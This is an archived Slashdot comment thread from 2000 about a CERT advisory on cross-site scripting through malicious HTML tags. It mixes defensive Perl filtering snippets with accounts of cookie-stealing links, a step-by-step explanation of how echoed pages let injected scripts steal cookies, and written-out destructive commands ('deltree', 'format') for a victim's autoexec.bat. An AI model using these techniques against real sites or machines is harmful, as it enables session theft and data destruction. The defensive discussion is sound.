The Internet

CERT Advisory On Malicious HTML Tags 440

Anonymous Coward writes "CERT has published a major advisory on malicious HTML tags embedded in client Web requests. Basically, all clients and all Web servers are affected by this problem. If a Web site does not scrupulously check all input data before posting it back to the user, malicious scripts could be executed over supposedly secure and trusted connections. Recommended solutions include completely overhauling Web sites, disabling cookies and scripts, and 'Web Users Should Not Engage in Promiscuous Browsing.' Sun, Microsoft, and Apache should have notices up on their sites shortly."
This discussion has been archived. No new comments can be posted.


Comments Filter:
  • by Anonymous Coward
    One of the nice differences between *nix and M$ is that *nix actually has a real concept of separate user contexts. My browser settings are held in MY directory subject to MY permissions, etc. I can also install/use software in my home directory - root doesn't have to do it (unlike NT which frequently requires administrator access to install user software).

    Therefore...

    Why not isolate browsing? I need to do some research and try some things as this is not a strong area for me but perhaps someone has some comments/ideas on the following possibilities:

    1) Create a separate user (say "surf") and only browse as that user. Give your normal user read access to that user's files but strictly limit surf's power. This would at least limit the possible damage from evil scripts. OK for a one user desktop setup but a problem for multiple users.

    2) Isolate browsing to a specific user subdirectory. Any ideas on how practical this would be? I am guessing that one would have to set up a different user with permissions only to that subdir and browse as that user. Or, could chroot be used to limit the browser's access or would that block too many library/system calls?

    3) Create a /surf/ tree with the browser software and /surf/user directories. Only allow browser access to the surf tree (even chroot?). Each user would have a subdirectory with appropriate permissions for their browser files (saved files, .browsersetup, etc.). A link from the normal home directory to the /surf/user directory could make this fairly transparent to the end user.

    Any other ideas? We should be able to beat this problem at least in the *nix world by limiting the power of the browser.
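
    For anyone who wants to experiment with option 1, here is a rough Perl sketch of a launcher that drops to a dedicated account before starting the browser. The "surf" account and the browser binary are assumptions, and this is only a sketch, not a hardened sandbox:

    #!/usr/bin/perl
    # Launch the browser under a dedicated low-privilege "surf" account.
    # Run this as root (or via sudo) so the UID/GID change is permitted.
    use strict;
    use POSIX ();

    my @pw = getpwnam('surf') or die "no such user: surf\n";
    my ($uid, $gid, $home) = @pw[2, 3, 7];

    POSIX::setgid($gid) or die "setgid: $!";   # drop group first, then user
    POSIX::setuid($uid) or die "setuid: $!";
    die "still running as root?\n" if $> == 0;

    $ENV{HOME} = $home;                        # browser settings live under surf's home
    exec 'netscape' or die "exec netscape: $!";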

  • by Anonymous Coward
    My Microsoft Internet browser protects me from bad things like this. I don't think Microsoft would be such a successful company if they allowed hackers to hurt their users. There are a lot of really smart people at Microsoft and I'm sure they have fixed any problem that might happen because of this.

    P.S. I also practice safe computing as Microsoft has told me, it is important to avoid "bad internet zones"!
  • Get it as part of your distribution (the bsd port is "ijb"), or at www.junkbuster.com.

    It works wonderfully. I rarely see blinkies anymore, and there are only two sites that can give me cookies, and a third that can retrieve one that it can't change.
  • When Mozilla becomes a usable browser, this argument becomes valid. Not that I expect this to happen in the next N years, N>=1.
  • That's what passes nowadays for a new hole? I, far from being a security expert, wrote patches for guestbooks on this subject about 3 years ago. It's just obvious you should think about this. Isn't this why I see "allowed HTML" here below?

    Now all we lack is somebody patenting the idea of fixing this "new hole"...
  • <i>The engineering circle has had years to do something about this crap. They didn't. Browser makers could have shipped their browsers with all client-side execution "features" disabled by default, all along. They didn't. They could have put up a warning popup that tries to scare the user whenever they turn on this stuff. They didn't. Who are you calling irresponsible?</i>

    As an engineer I can say that this isn't always the case. You work to catch most of the gotchas of doing something a certain way, and even <i>with</i> peer review and countless trials, you can't foresee every consequence.

    Turning everything off by default makes your product harder to use, so you lose customers and therefore sales. (with browsers being free this blurs the line but the effect is the same)

    Making screens popup all the time is annoying to the customer. There are lines to be drawn all over the place. Often they get drawn wrong, but that's often the fault of management, not the guys who actually do it. He who writes your paycheck gets final say. Not everyone is fortunate (or wealthy) enough to walk whenever they can't agree with management on all issues.
  • This advisory basically states that it is potentially possible to do extremely destructive things with HTML, especially given all the extensions.

    I therefore expect the following advisories to be put out:

    2001: The tags added in response to the CERT Advisory on Malicious HTML Tags can be exploited by embedding HXDHTML (Hyper eXtended Dynamic HTML) that can run arbitrary code and a coffee maker over a supposedly secure link.

    2002: The tags added in response to the CERT Advisory relating to the CERT Advisory on Malicious HTML Tags can be exploited by embedding sections of Bill Gates' brain, which can execute random fragments of assembly that can result in a Denial of Service attack.

    2003: The tags added in response to the CERT Advisory relating to the CERT Advisory relating to the CERT Advisory on Malicious HTML Tags can be exploited by a child of 3 just by sneezing. NOW WILL YOU STOP ADDING THESE B***** TAGS AND SECURE YOUR PROGRAMS!

  • Yes, that would be correct. I was at work and not thinking right. This shows something, though: it's actually REALLY hard to type messages like that because of the &amp;lt; that you have to type to have it show &lt; and don't even get me started on quoting.
  • Disable JavaScript. :) Couldn't be easier...
  • Well, the issue then boils down to who has the right to execute scripts. OK, it might sound a little strange (and I'm not sure my explanation will clear things up either), so let me try to explain...

    If I have my homepage somewhere in the other-hosts-it-for-me world (say Xoom, or AOL for that matter), they could suddenly decide that "JavaScript is a security risk". They simply modify their server to turn off all JavaScript, and BOOM! My JavaScript breaks, and I have no way to get around it. Are they allowed to do this? Probably, yes. Should we try to stop it? Yes! ;-)

    Anyway, the system you're proposing doesn't fit well into HTML. A tag should be composed of a start-tag and an end-tag, not two empty tags with different attributes. Of course, having a `normal' HTML tag would again lead to security problems. I think the best way to solve this problem is parsing the HTML, and allowing only the tags one wants (like Slashdot does -- I'm sure some useful code could be extracted out of slash 0.9).

    /* Steinar */
  • No, it's not down -- the advisory itself is just so secure, we can't get to it. (I get a 403.)

    /* Steinar */
  • When writing CGI programs with Perl and CGI.pm I use a wrapper for getting URL parameters which will check them to ensure they contain only the characters [a-zA-Z0-9_]. It's not necessary most of the time, but it does help protect against new attacks that might be discovered, like this one.

    In my opinion, strings passed as URL parameters should be human-readable so that the URL makes some sense; if you're passing long chunks of data such as HTML, it's better to do that with a POST request, which you should also validate thoroughly. So it's no great hardship to insist that HTML tags, hidden null bytes and so on aren't allowed in URLs.
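
    A minimal sketch of the kind of wrapper described above, assuming CGI.pm; the helper name safe_param and the [a-zA-Z0-9_] whitelist are just illustrations:

    use strict;
    use CGI;

    my $q = CGI->new;

    # Return a parameter only if it consists entirely of whitelisted characters.
    sub safe_param {
        my ($name) = @_;
        my $value = $q->param($name);
        return undef unless defined $value;
        return undef unless $value =~ /^[a-zA-Z0-9_]*$/;
        return $value;
    }

    my $user = safe_param('user');
    defined $user or die "bad or missing 'user' parameter\n";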
  • I don't think this is really newsworthy. Of course you need to scan the user input to make sure it contains only elements in a specifically defined set of elements. You should search for onClick, onMouseOver, on* javascript events, FORM and SCRIPT elements, and anything else that doesn't fit a strictly predefined list of allowable input.

    I thought people knew this stuff. At least slashdot seems to get it right.

    -jwb

  • This is just a demonstration of the fact that this isn't a trivial issue. The above list of tags appears to allow <P onmouseover=somejavascript> through. Now, when I tried it, slashdot didn't accept it, but that is another issue.

    Some browsers (especially IE) allow lots of attributes to lots of tags that you wouldn't normally think of as dangerous.
  • It is very true that not all webservers are impacted by this issue.

    However, just because a company has not released information about its problems doesn't mean it doesn't have them. In Roxen's case, it has obvious issues, at least with the 404 page on the server at http://www.roxen.com/

    The purpose of this post isn't to point at vendors and laugh, but to drive home the point that far more things are vulnerable than you may think. Apache, IIS, Netscape Enterprise (or whatever it is called now), Zeus, thttpd, WebSitePro... that should cover a majority of sites. Some are less vulnerable (Apache), some more (no names).

    It is also important to remember that the webserver itself is only the smallest part of the issue. If the problem could be fixed by just patching your webserver, it would be nowhere near as big of an issue.
  • you can get and hack your own private copy of Mozilla

    Yes, in theory.

    For some of us, our strengths lie not in writing code, but in identifying valuable features and usable interfaces.

    Those that ignore such talented (albeit different) voices are doomed to live in a world where the majority settles for crap (like windows) because it is at least usable, even if it isn't elegant or efficient from a technical point of view.

  • Translation 1: I'm too lazy to learn how to do anything -- someone do my work for me.

    I didn't say I (or anyone else) couldn't write code; I said that our strengths lay elsewhere. You must be a true newbie if you've never run across someone who really just wasn't such a great programmer, no matter how hard they tried, or how much they studied.

    And of course, when you want to see a movie, you go film/act/direct/produce it yourself. And you do all your own cooking (you never eat in restaurants since you've yet to find someone who can cook as well as you do.) You don't bother to play any video games other than the ones you developed, since you're the best game designer there is. You write your own novels, too. Naturally, you do all your own auto repairs, and home repairs, and you take your own trash to the dump, and you only listen to music you've written/performed/recorded.

    My, my, aren't we the Heinleinesque ideal?

    Translation 2: I'm best suited for telling others what to do.

    Well, not me personally, but yes, there are those whose strengths lie in managing projects. They know how to motivate people, and can effectively run interference between the people that do the work and those whose job it is to prevent them (upper management). Generally, they aren't what would be called a geek, but the better ones (in the high-tech industries, anyway) are at least technologically aware.

    But of course, you're the ultimate superman, doing everything yourself because you're the best person for every job.

    As for me, personally, I've been told that I'm really good at designing usable interfaces and explaining things to the non-technical. So I've done some teaching, a fair bit of tech support, a lot of specs, and quite a bit of coding. (Mind you, I wouldn't bet I was coding before you were born, but it wouldn't surprise me.)

    Oh, no, wait a sec -- I've got a list of nifty ideas for projects right here. As soon as I dig 'em up, I'll expect you to get to work...

    Thanks, but no thanks. I'm currently working way too much, and have a ton of projects of my own, ranging from writing documentation, to rewriting a couple of systems in Java, to finishing a number of web sites, to getting the stupid computer in the bedroom to see the network again, after swapping ethernet cards.

    But sure, e-mail me [mailto] with your list of projects. If any of them have merit, and I can find the time, I'll work on them, and make the money from them. I'm not too proud to think that others may have good ideas (perhaps even better than my own) and put them to use.

    Which leads me to the point I made originally (and that you missed) -- when someone offers a suggestion in an area that is not your area of expertise, take advantage of it.

  • I spent some time last weekend speaking to a person who used to sell a database package with a web interface. I was trying to demonstrate that because the package performed no filtering for HTML code in entered text, a malicious user could essentially do anything, eBayla-style - I demonstrated with an iframe. She was amazed.

    I've been developing stuff for this database package at work for about a year now. It's purely internal. I use this issue to pull off cute stuff in comments fields, like bulleted lists, font colours, bold, etc - just like /. - but I know it's capable of much more. When we make info public we're unfortunately going to have to disallow data entry because of this flaw, or we're going to have to upgrade to another version of the software (and I'm going to have to spend 6 months in hell whacking into brand new problems... )

    BTW: Anyone know if the UBB filters this stuff?

  • When Mozilla becomes a usable browser, this argument becomes valid. Not that I expect this to happen in the next N years, N>=1.

    Others may have a different opinion.

    (This comment posted with Mozilla M14 nightly build)
  • This just points out a basic security flaw in the entire web programming model. As far as I know, exploits that take advantage of the vulnerabilities described in the advisory have been around for quite some time.

    It is entirely up to the web site to validate the data entry of its users. Unfortunately you cannot trust every web site you use to catch every possible exploit. If you are worried about it, disable JavaScript/VBScript.

    To fix this problem would require some enforced CGI-coding standards or certification programs for web sites - "We use only Web-Guard 2.0 certified server side scripting tools to keep you safe from script kiddies!"

    -josh
  • There's no reason why anyone should be remotely alarmed by this. If you have any decent security in your website, then you filter everything between script tags (I typed a pair around "code here" -- did they appear?). As for adding that crap to a link, anyone who knows what a QUERY_STRING is knows that this can be done. So in all reality, there's nothing remotely alarming here. If there were good browser security on the client side to begin with, then this wouldn't be an issue at all.
  • Actually, that isn't too hard, on either Linux or Windows 9x (haven't tried it on NT or 2000). Under Linux, pop open your /etc/hosts file and make an entry for each site at 127.0.0.1. All those requests will get sent right back to you, at which point they die the death.

    Same thing under Windows, except the file is C:\Windows\hosts. (There's a sample file located at C:\Windows\hosts.sam. Rename it to get it to work).

    If you're using Internet Explorer, you can use custom "security zones" to assign arbitrary permissions to pages. I don't think you can use it to block a site entirely, but you can disable cookies, java, javascript, activeX, yada yada.

    Finally, any proxy server or firewall worth its salt will allow you to restrict access to certain web sites.
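
    For example, a couple of lines like these in /etc/hosts (the hostnames are made up) send requests for those sites straight back to the local machine, where they die quietly:

    127.0.0.1    ads.example.com
    127.0.0.1    banners.example.net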
  • "This one really took me by surprise as a web developer."

    Not much of a web developer are you? :-)


    I knew someone would have that reaction.

    let me clarify: I build web sites. I design pages, write HTML and do wonderful things like that. I don't build databases, enact security measures, or enable filtering or processing of form input. I'm not at all involved in developing the format of URLs or the formats in which we accept data. I build web sites, not networks or security protocols.

    That said, as a "web developer", I'm perfectly aware of what CERT says:

    When client-to-client communications are mediated by a server, site developers explicitly recognize that data input is untrustworthy when it is presented to other users. Most discussion group servers either will not accept such input or will encode/filter it before sending anything to other readers.

    And I doubt, as they do, that many people do no processing whatsoever on public data. The issue at hand is what happens to private data, which CERT seems to think (and I tend to agree with them) not so many developers get concerned about.

    I can certainly think of situations (like, say, a free web hosting service or web-based email) where having HTML more complex than bold, italic, etc would be desired as input.
  • Assuming you meant s/&lt;(\/){0,1}\s*b\s*&gt;/<$1b>/gi so that the tags are properly closed, then &lt;b&gt; becomes <b>. How can I type a b between angle-brackets then?

    Nitpicks aside, you're right. Most people have been handling crap like that since Netscape thought up <BLINK>

  • > Following CERT's recommendations amounts to disabling a vast part of the web's functionality entirely

    Yeah...disables exactly the parts I want disabled, which is why I turned off Javascript about a year before the CERT advisory.

    --
    It's October 6th. Where's W2K? Over the horizon again, eh?
  • Sure, telling lynx to represent itself as a browser capable of keen graphics effects, or telling Netscape 3 to identify itself as something capable of DHTML, etc, is silly, and you deserve the messy page you get. But, telling a browser to identify itself as any other browser, and to behave like it if possible, makes sense. I can do it, with Junkbuster, if I wish, but I usually leave it transparent, because any IE only page isn't a page I'll ever visit.

    You could have an IE5 filter on Mozilla that would take a page and render it like IE5, complete with whatever bugs. That would be funky. And add filters for all the main browsers, so a web designer could check behavior in many browsers without having them all installed.

  • How would that be hard? Just get the browser to substitute their ActiveX control for a similar one set to return a random number. It might also be possible to trap these opcodes, so that a system util could return any specified number to any program which asked, unless that program was run at OS level (which not much is, ideally.)

    Anyways, you control your machine and the software on it, spoofing an ID number isn't hard.

    You could do it by trapping the ID check request.

    You could do it by subverting the applet that checks.

    You could do it by watching outgoing packets to the intel site and replacing the ID with a fake one.

    etc.
  • Perhaps this would work best as a browser addon, where you (for instance) install Junkbuster the plugin, and it modifies a few browser menus and displays, and does this. The browser could pass all requests, incoming HTML, etc., through specific filters, so any program that wanted could fit in as a filter, saving you from having to install a proxy for what is really just a filtering job.
  • You're right, of course, that this is a weakness of JavaScript, not SlashDot. And that it's similar to a plain link to a malicious site. But there are a couple of other factors:

    1. If a malicious link were posted on your site, I would be able to take some kind of action against you.

    2. I may have told my browser to "trust" slashdot, but not your site.
  • Oh, it's a fake article. We geezers can tell. Some text vandal with nothing better to do.
  • This really depends on a number of points
    a) Coding skill
    b) The time you have
    c) Whether or not you can get a working copy of Moz to compile on your machine - I've never managed it and I've been trying regularly since March 99
  • Simply, the proposal is this. The server itself should *optionally* scan for and block any potentially malicious code in GET or POST requests, before they're passed to the handler. Yes, this would eliminate a large number of potentially useful uses of scripting, but a server administrator who had turned on this option would know that the site was secured against such attacks, rather than the security being up to *every* cgi script on the machine.

    There could even be several levels of such scanning, for instance blocking all html tags in client requests, or only a subset of such tags, or no blocking.

    Admittedly this isn't an ideal solution, but personally, for the sites I run, I'd love to be able to turn on this option which would block all tags. I could still get a customer's name and billing info without needing any HTML tags in the input. Yes, I'd be working under a more limited subset of the possible functionality, but the added security would be worth it, and that choice should be available as a configuration option.
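
    Something close to the strictest level can already be approximated at the top of a CGI script, before any real handling runs. This sketch assumes CGI.pm and simply drops every HTML tag from every GET/POST parameter; a server-side module would do the same thing once, for every script:

    use strict;
    use CGI;

    my $q = CGI->new;

    # Scrub every parameter before the rest of the script ever sees it.
    for my $name ($q->param) {
        my @clean;
        for my $value ($q->param($name)) {
            $value =~ s/<[^>]*>//g;        # strictest setting: no tags at all
            push @clean, $value;
        }
        $q->param(-name => $name, -values => \@clean);
    }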

  • Even if /. filtered that out of the link, you could still do it on the other side of a plain HTML link.

    There is no way /. could protect you from running arbitrary Javascript if you click on a link, except preventing posters from linking to arbitrary locations.

    However, since /. works just fine with Javascript off, you can defend against it just fine by turning Javascript off while surfing /.

    I don't think this is a weakness of /. but an inherent weakness of Javascript-enabled browsers.
  • Jeez man, that beats them all so far!

    Mod this up someone!

    (In case it doesn't work on your machine : it pops up an alert as soon as this page loads. Works on latest Netscape release)
  • How about this one
  • Sorry, I didn't mean for my post to come across as "my server is better than your server" - I was just pointing out the error in assuming that because the "big three" were listed as vulnerable, all web servers are vulnerable. And yes, I agree that just because someone didn't respond doesn't mean they're not vulnerable - but the CERT document doesn't say that Roxen WAS contacted (in fact, it doesn't say anything about them at all.) Now, I may have an incomplete understanding of the problem, but it seems to stem from websites allowing people to post HTML tags in guestbooks and such.. so if the webserver strips out all HTML tags, how does "a simple server patch" not solve the problem? As I said, if the server by default dequotes all HTML (and RXML, and MySQL) tags, how can you say that the server is still affected?
  • I tried this out (with my own CGI targeted) and by golly it works -- it steals my slashdot cookie and puts it in the log.


    I tried this out with some other sites I have cookies in and the script doesn't execute.

    Any references on how this peculiar URL syntax works so I can figure out why, if I replace "www.slashdot.org/notthere" with "mydomain.com/notthere", it doesn't redirect?

  • Does it really?

    It shouldn't work; if it does, this would be really bad.

    The script doesn't get executed until the 404 page is sent back from the slashdot server with the offending URL mis-encoded. (The &lt;script&gt; string shouldn't become a live script tag; it should be echoed back as the encoded, harmless text.)
  • Gotcha. I was initially stymied by the fact that the "URL" wasn't a valid w3c URL; now I see that the server has to cooperate in sending the offending script back to the user.

    I've been testing this out on my freethreads based discussion group with embedded HTML turned on. Using your example as a starting point I have successfully stolen some of my users' cookies using this method. Certainly the method could readily be improved (if you can call it that) by making it stealthier, but I've proven that I could in principle be affected by embedded scripts.

    You have to fuss a bit so that the forms processing stuff doesn't insert tags into the script (like <BR>). Since the 404 page is properly encoded on my server, I can probably get by with turning off HTML (freethreads has its own simplified "markup" language which is still a problem as far as links are concerned).

    So, I'm wondering. The scenario I've set up allows a malicious user who has access to my site to steal cookies from other valid users of my site. Since I don't have the 404 encoding problem, is there a way that users could have their cookies from my site stolen while viewing content on a third party server? Thus far it seems that the exploit requires that the browser get the malicious script sent back to it by the targeted (e.g. my) server.

    Thus far, it looks like the extent of exposure of my site's protected contents is to people who have the ability to upload HTML tags onto it. Not a good thing, but not too bad either. Do you think this is right?

  • <SARCASM>
    You're right, it was down right irresponsible of CERT to put security ahead of making mouseovers work. What's worse, those mouseovers represent "a vast part of the web's functionality." And now we don't have them. Thanks a lot CERT!
    </SARCASM>

    How about:

    * Thanks a lot, sloppy CGI coders, for failing to validate and filter *all* input!

    * Thanks a lot browser vendors, for failing to allow people choice in their browsing. Heaven forbid that I be allowed to choose which JavaScript executes on my browser -- it's either all or none!
  • >anyone who knows what a QUERY_STRING is

    Aye, there's the rub. This may seem like "common knowledge" to you or to the many other web-wankers out there, but in fact neither the typical user nor most kinds of computer specialists outside of your narrow little specialty know (or should know, or should have to care) what a QUERY_STRING is. In fact, I'll bet a large number of web-wankers, unschooled as you lot tend to be before you start proclaiming yourselves gurus, don't know what a QUERY_STRING is either because you never see one behind the layers of cruft in a web "authoring" tool someone with marginally more talent than you provided.

    And that is more than "remotely alarming". The real issue is that idiots can and do create web pages, so we need something that's safe to use even when those idiots are involved.
  • Hey everyone - follow this [slashdot.org] link!

    I tried to get it working on the new-user sign up page (where you might actually get someone's password), but the html is parsed out there (good work).

    http://net.bruno.net/ [bruno.net] (only malicious for the mind)
  • Perfecto Technologies [perfectotech.com] has a really good solution to this problem with their AppShield. It checks forms on the way out and then checks the data coming back to make sure it fits what it expected. I've seen this done as a home-grown solution at a Euro telco and it seems to work very well.

  • The problem with this is that a lot of links these days are really long (hundreds of characters sometimes), the browsers I know display the target left-justified, and so I often can't see the whole link without doing some painful stuff.

    Plus, I might have a good idea what to look for, but the vast majority of folks wouldn't know a scriptlet from a rubber duck. How does this sort of advice help my parents? A ten minute talk about 'trust' will do a lot more for them.


    EZ
    -'Press Ctrl-Alt-Del to log in..'
  • Imagine the damage that CNN troll could do with this.
  • I'm using IE (at work). The command "returntrue" is an error. Are the spaces getting stripped or something?
  • You could write a /. troll virus! It would post itself as a link which submitted a post containing itself as a link when you clicked on the link. Would be very nasty. Luckily most of the /. trolls seem to have a sense of nobility and post silly stories instead of nasty things.

    Also, it will not be too hard for Rob and team to fix this hole in /. by having the submit button investigate things that web browsers interpret differently (and not just HTML tags). I just hope Rob sees my warning about the possibility of a /. troll virus.

    Jeff

    BTW> You would need javascript to make a troll virus with an unlimited life span, but you would not need javascript to make a troll virus which only lived for a limited number of reproductions, so it might also be a good idea for /. to refuse posts which are submitted using the GET method.
  • Unless I'm missing something, the only real danger is from malicious code included in the QUERY_STRING (the part of the URL after the ? mark, in case anybody here doesn't know that). If that is the case, then we have a single point of entry to secure -- nothing else is necessary if we ensure that the QUERY_STRING doesn't include anything it shouldn't. (Or, to look at it another way, if we ensure that it only includes what it should.)

    Please correct me if I'm wrong, but please understand the advisory first! (Too many of the comments here have shown a lack of understanding, assuming it was the "protect user B from user A" issue.)

  • "How much can you really do with some "evil" Javascript?"

    A friend of mine visited a hacked-sites archive on an IE5 machine (windows 98 SE), and it executed some funky javascript program that caused a lot of memory errors (I think; I am not a good programmer) and other funny stuff.

    "Probably the most is to close the window or send a bunch of popups.
    This is not exactly formatting your hard drive. "

    Yes, yes it is. Given the number of times a windows machine might be rebooted, it's easy to alter the Autoexec.bat file to say something like this

    deltree /y c:\windows

    and then

    format /q c:

    I've seen it done, and another friend, visiting the same archive site, but a different page, got majorly screwed because of javascript opening a file on disk and changing the contents (or just creating a file, overwriting the old one).

    http://www.2600.com has the site, I believe, that both of them went to. So, when I went there on my linux box, I was unafraid. :-) Well, kinda. I mean, it is their fault, they said "Dangerous for windows users" right there next to the link.

    So, on my windows box, I made the autoexec and config files read-only. I don't know if it'll work, given Windows' ability to just override that kind of thing. I don't visit those sites.

    later
  • I don't know exactly how Amazon's one-click works, but I'm pretty sure it can't have the problem you are describing. When you turn on Amazon's one-click, they give you a cookie to identify you. When you have this cookie, you get the one-click link on all of their product pages. When you click on the one-click link, the server processes the link and also can check to see that you have the cookie and that the identities match. So you could send the one-click link to someone else, but if they clicked on it, they wouldn't have the cookie identifying themselves as you.

    And even if someone was trying to be malicious and somehow sniffed your traffic and got the cookie amazon gave you when you turned on one-click and somehow put it in their own browser, and then in their browser went to your URL to one-click buy something, they wouldn't get the product for themselves. They would just be buying the product for you with your credit card, since the shipping address and billing info is associated with the one-click. And it's possible Amazon has some other security measures that make even that scenario impossible.

    Oh, and referrers can be faked, so they are hardly security precautions. But it's possible they do something like send something in plaintext and encrypted and then decrypt the ciphertext and make sure it matches the plaintext.
  • Let me demonstrate this by posting the link that I created. If example.com supported this script, and "malicious code" were actually malicious, clicking on this link would screw you. :-)

    Click Here [example.com]

  • Well, I did this to kill whitepower.com's guestbook like, a year or 2 ago.

    Again, I think that this kind of problem indicates that the web programmers are totally amateur. I mean, you DO NOT TRUST THE USER. heh if you do, you're just asking for trouble. I'm not saying that I'm a good programmer or a very experienced one - it's just common sense.

    The most obvious and common screw up of this sort is when someone tries to include some html tags in a dynamic post - like a blink tag - and they forget to close it - you see it all the time - the rest of the page starts blinking. The best way that I've found to fix this is to replace all tags with &lt; and &gt; and then specifically re-enable particular tags (bold, italic, and so on), checking that there are closing tags. That way you get fewer problems.

    But again, I think that there needs to be some kind of checklist of key points to remember and check when developing apps - simple stuff like "don't ever interpret code that a user could have a part in creating", "don't trust the user to get it right", or "don't trust that the user is friendly" - stuff like that. And as I said, I'm not very experienced, so I'm sure that there are a lot more helpful points that someone could supply. :)
  • CERT seems to be stating the obvious here. And I'm glad. People need this rammed into their heads: if you want security, separate CODE and DATA. Once these are separated, you can begin to selectively allow trusted places to include code with the data.

    I have no selective way of enabling Javascript for trusted sites in Opera or Netscape, but Mozilla could add this much needed feature -- allowing me to run without Javascript unless it's needed for something. Security is increased in this way.

    Netscape's horrible 4.x browser seems to require Javascript for CSS to work at all, though, so you have to settle for disabling Java, and forcing it to use a Junkbuster proxy (nukes cookies except for the exceptions), and another for script escaping.

    Web boards, AFAIK, escape all content by default. This is fine, as escaped content comes out as visible data, and not as possibly malicious code. The various exploits only seem to affect sloppily programmed webboards (i.e. not Phorum [phorum.org]; it's secure).

    Maybe someday we'll be allowed one click "trust for js" "trust for cookies" "trust for java" etc... As they are all executable code or, in the case of cookies, serial numbers allowing tracking (think doubleclick.net). CSS1 and HTML4 are perfectly secure by themselves -- remember that. Opera runs fine in "HTML & CSS only" mode.
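
    As a concrete (if simplistic) illustration of keeping DATA from turning into CODE, escaping on output with HTML::Entities (from CPAN) turns would-be markup into inert, visible text:

    use strict;
    use HTML::Entities qw(encode_entities);

    my $untrusted = q{<script>alert('gotcha')</script>};
    # Prints &lt;script&gt;...&lt;/script&gt; -- harmless text, not live markup.
    print encode_entities($untrusted), "\n";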
    ---
  • Drat, now I can't post my javascript to uninstall windows and reinstall linux on an unsuspecting person's hard drive to slashdot. That would be a wonderful way to perform software updates! When the new version of Importantsoft comes out, you email every one of your (l)users a bit of 'sploit code and you never have to get off your butt!
  • In Navigator you can stop animations once the page is loaded, using the ESC key.
    Sometimes. Often I find that they start right back up again. If I was proficient with the junkbuster [junkbusters.com] configuration files, I'd immediately add any animation that did that into my killfile.
  • by Anonymous Coward on Wednesday February 02, 2000 @11:51AM (#1310802)
    Why is it doing this!!! How does it know my Visa number!!! Damn you cmdr taco!!!
  • by Anonymous Coward on Wednesday February 02, 2000 @10:48AM (#1310803)
    Another important option: no changing status bar messages. By using an ONMOUSEOVER event to change the status bar message, you can make it look like a link is harmless. The status bar may show "http://www.slashdot.org/" when the real link is "javascript:evilcode".
  • by GeorgeH ( 5469 ) on Wednesday February 02, 2000 @10:04AM (#1310804) Homepage Journal
    Does not engaging in promiscuous browsing mean that I can't use Dug Song's Webspy [monkey.org] program? Or does it mean that I should just stop looking at all this pr0n? I'm so confused.
    --
  • by Marc Slemko ( 6200 ) on Wednesday February 02, 2000 @01:02PM (#1310805)
    Yes, it does work. There are cases where it doesn't work and various special circumstances that are sometimes needed to make it work, but it does work in a broad range of situations.

    This is what the advisory is about and the essence of what the new issue is. It is the impact of this that hasn't been well understood before. The advisory isn't explicit about the details because that's just the way it is written, and the issue is very broad. But if you read it and understand what it is saying, it does include all the necessary concepts.

    Suppose you want to exploit site A. What you have to do is find a page on site A that can echo back some part of the request unencoded and unfiltered. Then you send a user to that page. When the javascript comes back to them, their browser sees it as coming from site A and executes it. From there, you can control the user's interactions with the site however you want. Stealing cookies is only the most obvious way; the only reason this one makes a request off to printenv on another server is to send the cookies out and show people they are being sent, in a URL-encoded-twice format.

    If you wanted to apply this to Amazon, you could. However, you would have to find a different request to make. For example, on slashdot the 404 page doesn't properly encode its output. On amazon there are other pages that have the same problem. The site specific part is finding a page on the site (any page) that you can use.

    For those that say "well, just don't click on any links with script tags in them", that doesn't change anything. I could send you to a page that redirects you there. I could do an onmouseover attribute to make you not see it. etc.

    It also isn't hard to get many users to go to the URL you specify via other means, such as HTML email with the right stuff in it.
  • by Marc Slemko ( 6200 ) on Wednesday February 02, 2000 @11:06AM (#1310806)
    There are issues here that have not been widely known before. The issues that have been known for a long time are that if user A submits content for user B to view, it has to be properly encoded. This advisory shows that even if user A submits content that only user A views, it can still pose a security problem. Even worse, encoding things properly is a very difficult task, especially when alternate character sets are concerned.

    Many many many sites are vulnerable to this. Yahoo, eBay, various Microsoft sites, Amazon, etc. The list goes on. Slashdot is vulnerable.

    I like to think I know what I'm doing around the web, and I certainly had trouble figuring out all the ins and outs of how things have to be encoded in particular situations. I still don't think they are all figured out.

    The real issues here are a lot more subtle than they may appear at first. While the basic components of the issue aren't anything new, and no one familiar with the technologies should be surprised to hear that this issue exists (even without being aware of the details beforehand), they have never been publicly put together in this manner.

    Also note that this isn't just about script tags; you can insert other HTML that can be just as dangerous.
  • by deusx ( 8442 ) on Wednesday February 02, 2000 @01:05PM (#1310807) Homepage
    Try Bookmarklets.com [bookmarklets.com], because believe it or not, this has all been done before and it's actually pretty useful.

    Note-- Javascript laden links ahead: (None are malicious)

    You can do things like this executive dice roller.

    Or, read your cookie that was set for this site. How about seeing when this page was last modified?

    See a word over 2 syllables you don't know on Slashdot? Search at Dictionary.com.

    Do a reverse lookup on someone's phone number.
  • by Bernal KC ( 10943 ) on Wednesday February 02, 2000 @10:34AM (#1310808) Homepage
    I would settle for making the Jscript on/off switch more accessible. I toggle it on and off frequently -- but it is way more difficult than it ought to be. Especially with IE.

    Has anyone rolled an app/applet that makes it easier to toggle Jscript?

    [I'd also love to have another utility to clear my Win Documents menu.]

  • by Roofus ( 15591 ) on Wednesday February 02, 2000 @10:14AM (#1310809) Homepage

    Basically, check the link before you click it. Look for any sign of an embedded evil script in the ?variable=badstuff.


    Of course, if the method is post, you really can't see it then.

    Also, check all forms to make sure that the submit button is taking you to where you think it will.

    These tricks are nothing new. And after it all, I probably won't change my browsing habits.

  • by Lumpish Scholar ( 17107 ) on Wednesday February 02, 2000 @03:04PM (#1310810) Homepage Journal
    ... but IE 5.0 does a pretty good job of handling this for expert users only.

    IE divides the universe into four "zones": "Internet" (the default), "Trusted sites", "Restricted sites", and "Local intranet". (An explanation of the last would be really complicated.)

    It's possible -- but not easy -- to designate certain sites (e.g., *.yahoo.com) as trusted, with one set of policies for cookies and "active content" (Javascript and ActiveX), another set (e.g., *.doubleclick.net) with a much more restrictive policy, and the Internet (default) zone with fairly paranoid policies.

    On the system I'm most paranoid about (the laptop I use for e-mail), every attempt to send persistent cookies or run Javascript is flagged, and permitted only if I say it is. (Hint: Slashdot runs just fine thank you without Javascript.) It's a pain in the tush, but scary enough to keep me at it.

    I can deal with this. My mother couldn't. --PSRC
  • by CaptainSuperBoy ( 17170 ) on Wednesday February 02, 2000 @10:03AM (#1310811) Homepage Journal
    Applause to the CERT for speaking out on this issue.. however as a developer of web applications I'll say that this has always been a factor. Any time you take information from a user and serve it back, your site / users are at risk of being abused. It doesn't matter if you serve it back to everyone, or only the user who submitted the information.

